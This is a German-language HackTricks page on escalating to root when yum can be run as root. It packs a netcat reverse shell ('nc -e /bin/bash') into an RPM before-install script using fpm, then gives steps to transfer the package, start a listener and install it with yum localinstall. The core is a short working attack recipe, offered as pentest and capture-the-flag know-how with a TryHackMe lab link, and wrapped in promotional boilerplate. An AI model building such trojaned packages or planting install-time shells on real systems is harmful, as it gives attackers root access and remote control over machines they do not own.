Lernen Sie AWS-Hacking von Grund auf mit htARTE (HackTricks AWS Red Team Expert)!
Andere Möglichkeiten, HackTricks zu unterstützen:
* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)!
* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com)
* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden.
Weitere Beispiele rund um yum finden Sie auch auf [gtfobins](https://gtfobins.github.io/gtfobins/yum/).
# Ausführen beliebiger Befehle über RPM-Pakete
## Überprüfen der Umgebung
Um diesen Vektor zu nutzen, muss der Benutzer yum-Befehle als privilegierter Benutzer, d.h. als root, ausführen können.
### Ein funktionierendes Beispiel für diesen Vektor
Ein funktionierendes Beispiel für diesen Exploit finden Sie im Raum [daily bugle](https://tryhackme.com/room/dailybugle) auf [tryhackme](https://tryhackme.com).
## Verpacken eines RPM
Im folgenden Abschnitt werde ich das Verpacken einer Reverse-Shell in ein RPM mit Hilfe von [fpm](https://github.com/jordansissel/fpm) behandeln.
Das folgende Beispiel erstellt ein Paket, das einen before-install Trigger mit einem beliebigen Skript enthält, das vom Angreifer definiert werden kann. Beim Installieren dieses Pakets wird der beliebige Befehl ausgeführt. Ich habe ein einfaches Beispiel für eine Reverse-Netcat-Shell zur Demonstration verwendet, aber dies kann bei Bedarf geändert werden.
```text
EXPLOITDIR=$(mktemp -d)
CMD='nc -e /bin/bash '
RPMNAME="exploited"
echo $CMD > $EXPLOITDIR/beforeinstall.sh
fpm -n $RPMNAME -s dir -t rpm -a all --before-install $EXPLOITDIR/beforeinstall.sh $EXPLOITDIR
```
# Einen Shell abfangen
Unter Verwendung des obigen Beispiels und unter der Annahme, dass `yum` als Benutzer mit höheren Berechtigungen ausgeführt werden kann.
1. **Übertragen** Sie das RPM auf den Host.
2. **Starten** Sie einen Listener auf Ihrem lokalen Host, wie z.B. den [Beispiel-Netcat-Listener](/shells/shells/linux#netcat).
3. **Installieren** Sie das verwundbare Paket mit `yum localinstall -y exploited-1.0-1.noarch.rpm`.
Lernen Sie AWS-Hacking von Grund auf mit htARTE (HackTricks AWS Red Team Expert)!
Andere Möglichkeiten, HackTricks zu unterstützen:
* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)!
* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com)
* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Teilen Sie Ihre Hacking-Tricks, indem Sie Pull Requests an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden.